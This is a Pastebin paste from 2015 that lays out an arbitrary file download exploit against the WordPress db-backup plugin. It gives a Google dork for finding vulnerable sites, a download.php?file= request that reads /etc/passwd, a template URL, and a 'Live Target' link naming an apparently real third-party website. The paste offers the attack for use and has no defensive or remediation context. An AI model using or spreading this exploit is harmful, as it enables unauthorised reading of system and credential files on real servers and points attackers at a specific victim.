Kyfx

WordPress db-backup plugin File Download Vulnerability

Mar 6th, 2015
336
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.32 KB | None | 0 0
  1. Google Dork: inurl:wp-content/plugins/db-backup/
  2.  
  3. Exploit path: /wp-content/plugins/db-backup/download.php?file=/etc/passwd
  4.  
  5. Example: http://www.[target].com/wp-content/plugins/db-backup/download.php?file=/etc/passwd
  6.  
  7. Live Target: http://www.bagneris.fr/laosi-siglis/wp-content/plugins/db-backup/download.php?file=/etc/passwd
Add Comment
Please, Sign In to add comment